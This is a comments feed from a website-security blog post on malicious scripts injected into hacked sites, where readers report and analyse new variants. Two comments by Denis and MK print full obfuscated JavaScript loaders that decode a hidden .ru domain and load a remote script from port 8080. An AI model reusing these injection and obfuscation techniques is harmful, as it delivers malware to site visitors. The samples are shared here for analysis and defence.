Comments on: From Hidden Iframes to Obfuscated Scripts http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/ Website insecurity by example Sun, 05 Feb 2012 10:06:25 +0000 http://wordpress.org/?v=2.9.1 hourly 1 By: More on Troj/JSRedir-AK | Naked Security http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-9987 More on Troj/JSRedir-AK | Naked Security Wed, 27 Oct 2010 09:37:10 +0000 http://blog.unmaskparasites.com/?p=478#comment-9987 [...] one of the main methods for infection is via compromised FTP credentials. My colleague over at the Unmask Parasites. Blog has also reported seeing large numbers of sites affected. Affected websites [...] [...] one of the main methods for infection is via compromised FTP credentials. My colleague over at the Unmask Parasites. Blog has also reported seeing large numbers of sites affected. Affected websites [...]

]]> By: Troj/JSRedir-AK morphs into Troj/JSRedir-AR | Naked Security http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-9732 Troj/JSRedir-AK morphs into Troj/JSRedir-AR | Naked Security Sun, 17 Oct 2010 18:33:28 +0000 http://blog.unmaskparasites.com/?p=478#comment-9732 [...] over at Unmask Parasites. Blog. they also noticed this [...] [...] over at Unmask Parasites. Blog. they also noticed this [...]

]]> By: MK http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6786 MK Mon, 22 Feb 2010 11:23:33 +0000 http://blog.unmaskparasites.com/?p=478#comment-6786 I have been seeing a lot of this most recent variation. It is being randomized on each injection. However the injection is consistent across the account, and the structure stays similar. I have been seeing a lot of this most recent variation. It is being randomized on each injection. However the injection is consistent across the account, and the structure stays similar.

]]> By: Noxwizard http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6783 Noxwizard Sun, 21 Feb 2010 09:22:55 +0000 http://blog.unmaskparasites.com/?p=478#comment-6783 I forgot to mention that I was able to verify through the logs that the FTP credentials had been stolen. I forgot to mention that I was able to verify through the logs that the FTP credentials had been stolen.

]]> By: Noxwizard http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6782 Noxwizard Sun, 21 Feb 2010 09:18:17 +0000 http://blog.unmaskparasites.com/?p=478#comment-6782 Looks like a possible evolution of this one. The injected code is here: http://noxwizard.pastebin.com/f6e4b85cc Of course it's on two lines and not the way I have it. Ultimately what happens is that HS() gets called on line 578, which at this point is the following function: http://noxwizard.pastebin.com/f26805767 Looks like a possible evolution of this one. The injected code is here: http://noxwizard.pastebin.com/f6e4b85cc
Of course it’s on two lines and not the way I have it. Ultimately what happens is that HS() gets called on line 578, which at this point is the following function: http://noxwizard.pastebin.com/f26805767

]]> By: Anand http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6741 Anand Wed, 10 Feb 2010 18:56:30 +0000 http://blog.unmaskparasites.com/?p=478#comment-6741 My website also had this, the URL that I had was hxxp://picfoco-com.capitalone.com.salesforce-com.<strong>theantimatrix .ru</strong>:8080/google.com/google.com/vmn.net/netlog.com/over-blog.com Can somebody let me know whats the harm that this code would have done? Appreciate your response. Cheers Anand My website also had this, the URL that I had was hxxp://picfoco-com.capitalone.com.salesforce-com.theantimatrix .ru:8080/google.com/google.com/vmn.net/netlog.com/over-blog.com

Can somebody let me know whats the harm that this code would have done? Appreciate your response.

Cheers
Anand

]]> By: Denis http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6699 Denis Mon, 01 Feb 2010 15:19:40 +0000 http://blog.unmaskparasites.com/?p=478#comment-6699 This must be yet another revision <code> try{window.onload=function(){Iebf2d21q07z = '' + 'i)c(#i$b)!a&$-$(c$())o&)m((.@c&)!o&(@n(&s!)(t@!#a)n@!!t(@&(@c^$^#o^#n&t!a&&c!t(.!#(c(&@^o))$^m#&&.@&p@e@)^r&e#@)$z@h#(i!l!#^t((@o@n!@@^-#$^c)^(o(&m).#(b^i)$l&$(&!t$o^&!p^&.@&#&r!(u$:@))N#q#@5#(^b!(&@h$3)f&@)i#@t&$w&!1@r$#v!$/!&@$g####o($@&&o(g$l)@!e@$.@(c$$()o&m&.$@(a^u!/^##g))()o#^o#&#g$#l!^)e$$.&#c!o($@m($.!^^a!u)^!/@!t#$@o(($r(!#r&(&e#^n$t^@^$s!&$^.(@r#!@u)$#&/(a@$l$#l!(e!^g$)(r&$#)o$^&.^p()l!)^@/#$$##g#$o)@$o)$#^g(&l(e@.#!c&o&@m$#/^'.replace(/#|@|\^|\$|\!|&|\)|\(/ig, '') ; Jq2dz9nff1w0lm = 'appendChild';Rkn5tmljhj1c = d ocument.createElement('sc'+'ript'); Rkn5tmljhj1c.src = 'h'+'ttp://'+Iebf2d21q07z.replace(/Nq5bh3fitw1rv/ g, "8080");Rkn5tmljhj1c.setAttribute('defer', 'def'+'er');e val('document.body.'+Jq2dz9nff1w0lm+'(Rkn5tmljhj1c)');} } catch(P052l4jn ) {} </code> in this case translates to iciba-com.constantcontact.com.perezhilton-com.<b>biltop .ru</b>:8080/google.com.au/google.com.au/torrents.ru/allegro.pl/google.com/ This must be yet another revision

try{window.onload=function(){Iebf2d21q07z = '' + 'i)c(#i$b)!a&$-$(c$())o&)m((.@c&)!o&(@n(&s!)(t@!#a)n@!!t(@&(@c^$^#o^#n&t!a&&c!t(.!#(c(&@^o))$^m#&&.@&p@e@)^r&e#@)$z@h#(i!l!#^t((@o@n!@@^-#$^c)^(o(&m).#(b^i)$l&$(&!t$o^&!p^&.@&#&r!(u$:@))N#q#@5#(^b!(&@h$3)f&@)i#@t&$w&!1@r$#v!$/!&@$g####o($@&&o(g$l)@!e@$.@(c$$()o&m&.$@(a^u!/^##g))()o#^o#&#g$#l!^)e$$.&#c!o($@m($.!^^a!u)^!/@!t#$@o(($r(!#r&(&e#^n$t^@^$s!&$^.(@r#!@u)$#&/(a@$l$#l!(e!^g$)(r&$#)o$^&.^p()l!)^@/#$$##g#$o)@$o)$#^g(&l(e@.#!c&o&@m$#/^'.replace(/#|@|\^|\$|\!|&|\)|\(/ig, '') ;
Jq2dz9nff1w0lm = 'appendChild';Rkn5tmljhj1c = d ocument.createElement('sc'+'ript');
Rkn5tmljhj1c.src = 'h'+'ttp://'+Iebf2d21q07z.replace(/Nq5bh3fitw1rv/ g, "8080");Rkn5tmljhj1c.setAttribute('defer', 'def'+'er');e val('document.body.'+Jq2dz9nff1w0lm+'(Rkn5tmljhj1c)');} } catch(P052l4jn ) {}

in this case translates to
iciba-com.constantcontact.com.perezhilton-com.biltop .ru:8080/google.com.au/google.com.au/torrents.ru/allegro.pl/google.com/

]]> By: Larry at Home http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6692 Larry at Home Sat, 30 Jan 2010 18:55:42 +0000 http://blog.unmaskparasites.com/?p=478#comment-6692 May I ask what happens when I click on a hyperlink in a SPAM that sends me to one of these posted malware sites? Specifically,I have traced the IP's listed in the SPAM and it seems that the redirecting thru infected PCS and hosts ends up at an online drugstore.One of them is Luxpharmacy .com May I ask what happens when I click on a hyperlink in a SPAM that sends me to one of these posted malware sites? Specifically,I have traced the IP’s listed in the SPAM and it seems that the redirecting thru infected PCS and hosts ends up at an online drugstore.One of them is Luxpharmacy .com

]]> By: MK http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6684 MK Fri, 29 Jan 2010 09:44:29 +0000 http://blog.unmaskparasites.com/?p=478#comment-6684 As more of a explanatory note. The main difference between this and the previous version is the randomization of the "megaid" div id. Presumably to prevent this from being used as a signature. As more of a explanatory note. The main difference between this and the previous version is the randomization of the “megaid” div id. Presumably to prevent this from being used as a signature.

]]> By: MK http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6683 MK Fri, 29 Jan 2010 09:42:00 +0000 http://blog.unmaskparasites.com/?p=478#comment-6683 Revised yet again, most recent sample: try{window.onload=function(){document.write('<div id=Fuq9970c1s5ie8>drudgereport-com.chinamob</div>');Jzzicgcp586y245 = document.getElementById('Fuq9970c1s5ie8').innerHTML + 'i)^l(e@&&.$c!&#o#m)#&!.($&^w#s$j$$)-@c^!#@o$(m(@@.$!&w()!a$^$!v(&$e!(@b&)&a&@!&^n$#k$$^.@r!)(u!#^:)()O(&o!s$#&)@s^t)!#u$$))q!^u$!&o()#y$@^v&x)@^)/#&#^h@$(o&#^$m)e@!w##&a^)y(&!.!!c^o@m@)($.$$&@#c&&@n$^!/&$(h!@o$&m)^(@e#!^#w##a#!!^y@.!!$c#)@@!o$(m()^.^c#&!^n!^#/)(&(g(!o&o@#g#l((!e)^))^.$c^o!#$$m$/##(c#!#@a#$r^(&$e!#e$!&$r@b@#$u$()!i^&^l!(d$)!@e$r!^&.@(#c&(@&#o!m#!(@/))w($&o)$w&)^a^$#r$&!m&@o#)r@y(^.&^(c&)^!o($&m&@!^/(^'.replace(/\$|\(|@|\^|\)|#|\!|&/ig, '') ;document.write('<scr'+'ipt src=h'+'ttp://'+Jzzicgcp586y245.replace(/Oosstuquoyvx/ g, "8080")+'></scr'+'ipt>');} } catch(Tjkclo5m ) {} <!--908fc049c965bc03ac9c678ea1cd685f--> Revised yet again, most recent sample:

try{window.onload=function(){document.write(‘<div id=Fuq9970c1s5ie8>drudgereport-com.chinamob</div>’);Jzzicgcp586y245 = document.getElementById(‘Fuq9970c1s5ie8′).innerHTML + ’i)^l(e@&&.$c!&#o#m)#&!.($&^w#s$j$$)-@c^!#@o$(m(@@.$!&w()!a$^$!v(&$e!(@b&)&a&@!&^n$#k$$^.@r!)(u!#^:)()O(&o!s$#&)@s^t)!#u$$))q!^u$!&o()#y$@^v&x)@^)/#&#^h@$(o&#^$m)e@!w##&a^)y(&!.!!c^o@m@)($.$$&@#c&&@n$^!/&$(h!@o$&m)^(@e#!^#w##a#!!^y@.!!$c#)@@!o$(m()^.^c#&!^n!^#/)(&(g(!o&o@#g#l((!e)^))^.$c^o!#$$m$/##(c#!#@a#$r^(&$e!#e$!&$r@b@#$u$()!i^&^l!(d$)!@e$r!^&.@(#c&(@&#o!m#!(@/))w($&o)$w&)^a^$#r$&!m&@o#)r@y(^.&^(c&)^!o($&m&@!^/(^’.replace(/\$|\(|@|\^|\)|#|\!|&/ig, ”) ;document.write(‘<scr’+'ipt src=h’+'ttp://’+Jzzicgcp586y245.replace(/Oosstuquoyvx/ g, ”8080″)+’></scr’+'ipt>’);} } catch(Tjkclo5m ) {}

<!–908fc049c965bc03ac9c678ea1cd685f–>

]]>